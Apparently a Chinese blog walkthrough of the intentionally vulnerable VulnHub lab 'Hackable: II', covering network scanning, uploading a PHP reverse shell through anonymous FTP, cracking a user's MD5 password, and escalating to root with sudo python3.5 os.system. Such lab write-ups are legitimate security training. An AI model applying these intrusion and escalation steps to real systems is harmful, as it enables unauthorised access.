VulnHub靶场渗透实战-hackable-ii

靶场地址:Hackable: II ~ VulnHub

 靶场难度:easy

适用场景:Virtualbox   

网络模式:桥接模式

一:信息探测

1.主机发现

 换种主机发现的方法。

netdiscover -r 192.168.1.1/24

 2,开放服务及端口。分别访问一下。

 2,ftp服务-anonymous登录。

 3,看一下目录,准备好接听电话!

gobuster dir -u http://192.168.1.26:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

 发现和 ftp 中的一样,应该是 ftp 服务器提供的,可以尝试一下在 FTP 服务器中放置一个 webshell,然后用 Web 浏览器执行它。

 二:漏洞利用

1:利用ftp上传shell,

拷贝 kali 中的 php-reverse-shell.php当前目录,修改为反弹shell监听的IP。

 2:上传成功

put php-reverse-shell.php

 3:反弹成功

 4:提权

1;切换到shell,可以优化一下的意思。

python3 -c 'import pty;pty.spawn("/bin/bash")'

1;首先,查看密码本,发现shrek这个用户,或者直接进到home,运行一下。

2:shrek 用户的密码,md5解密。

 

 3:连接到ssh。

 三:提权

这个用户只能用sudo使用python3.5这条命令 使用python os库调用系统命令

sudo python3.5 -c 'import os;os.system("/bin/bash")'

 ssh提权成功,两个flag。

 

 2:监听提权成功,两个flag。

 perfect !!!

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值